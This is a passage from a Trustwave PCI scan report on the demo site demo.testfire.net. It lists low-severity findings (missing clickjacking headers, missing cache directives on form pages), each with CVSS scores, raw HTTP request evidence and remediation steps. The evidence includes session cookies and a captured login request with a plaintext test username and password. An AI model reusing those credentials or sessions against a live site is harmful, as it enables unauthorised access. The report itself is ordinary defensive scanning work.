directive.

174 No Clickjacking Protection 2.6 Low Pass URL: http://demo.testfire.net/


present Port: tcp/80

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 508 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6FBDC1BA64262E169CD8AA130C5A6D25;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:00:33 GMT"]}
url: http://demo.testfire.net/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

175 No Clickjacking Protection 2.6 Low Pass URL: http://65.61.137.117/


present Port: tcp/80

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 509 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: http
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=43417874F1E2104EC67B2F9DEE17E8CE;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:01:27 GMT"]}
url: http://65.61.137.117/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

176 No Clickjacking Protection 2.6 Low Pass URL: https://demo.testfire.net/


present Port: tcp/443

This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Polilcy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.

CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 510 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=ECBF550A2EE43223488AC21A19DCD097;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:02:22 GMT"]}
url: https://demo.testfire.net/

Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.

177 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net/index.jsp?content=business.htm


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 511 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net/index.jsp?content=business.htm


HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

178 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/sendFeedback


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 512 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST https://demo.testfire.net:8443/sendFeedback HTTP/1.1


Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 513 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

179 Absence of caching 2.1 Low Pass URL: https://65.61.137.117/index.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://65.61.137.117/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=3804E3482E26BDF0C73231467A2AC9D4

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 514 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

180 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/index.jsp?content=personal.htm


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://demo.testfire.net:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 515 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

181 Absence of caching 2.1 Low Pass URL: https://65.61.137.117:8443/


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

182 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/doLogin


directives for pages having Port: tcp/443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 516 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

forms Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

<form action="doLogin" method="post" name="login" id="login"


onsubmit="return (confirminput(login));">
<input type="text" id="uid" name="uid" value="" style="width:
150px;">
<input type="password" id="passw" name="passw" style="width:
150px;">
<input type="submit" name="btnSubmit" value="Login">

Request: POST https://demo.testfire.net/doLogin HTTP/1.1


Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 517 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Length: 42
Content-Type: application/x-www-form-urlencoded

uid=CHSuser&passw=Passwor1&btnSubmit=Login

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

183 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/index.jsp


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 518 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET https://demo.testfire.net/index.jsp HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

184 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/index.jsp?content=business.htm


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 519 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://demo.testfire.net:8080/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

185 Absence of caching 2.1 Low Pass URL: http://65.61.137.117:8080/index.jsp?content=inside_contact.h


directives for pages having tm
forms Port: tcp/8080

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 520 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

186 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/index.jsp?content=inside_conta


directives for pages having ct.htm
forms Port: tcp/8443

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 521 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

187 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/search.jsp?query=_WSETESTDA


directives for pages having TA
forms Port: tcp/8443

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 522 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Data submitted via forms present on pages without caching directives,


can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 523 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
response containing form.

188 Absence of caching 2.1 Low Pass URL: http://65.61.137.117/index.jsp


directives for pages having Port: tcp/80
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://65.61.137.117/index.jsp HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 524 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

189 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/sendFeedback


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: POST http://demo.testfire.net:8080/sendFeedback HTTP/1.1


Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/feedback.jsp

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 525 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

190 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net:8443/


directives for pages having Port: tcp/8443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 526 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<form id="frmSearch" method="get" action="/search.jsp">
<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET https://demo.testfire.net:8443/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

191 Absence of caching 2.1 Low Pass URL: https://demo.testfire.net/search.jsp?query=_WSETESTDATA


directives for pages having Port: tcp/443
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https

Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 527 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET
https://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

192 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 528 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.

<form id="frmSearch" method="get" action="/search.jsp">


<input type="text" name="query" id="query" accesskey="S">
<input type="submit" value="Go">

Request: GET http://demo.testfire.net:8080/ HTTP/1.1


Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.

193 Absence of caching 2.1 Low Pass URL: http://demo.testfire.net:8080/feedback.jsp


directives for pages having Port: tcp/8080
forms
Data submitted via forms present on pages without caching directives,
can allow data to be cached on browser/ cache giving access to the
data.

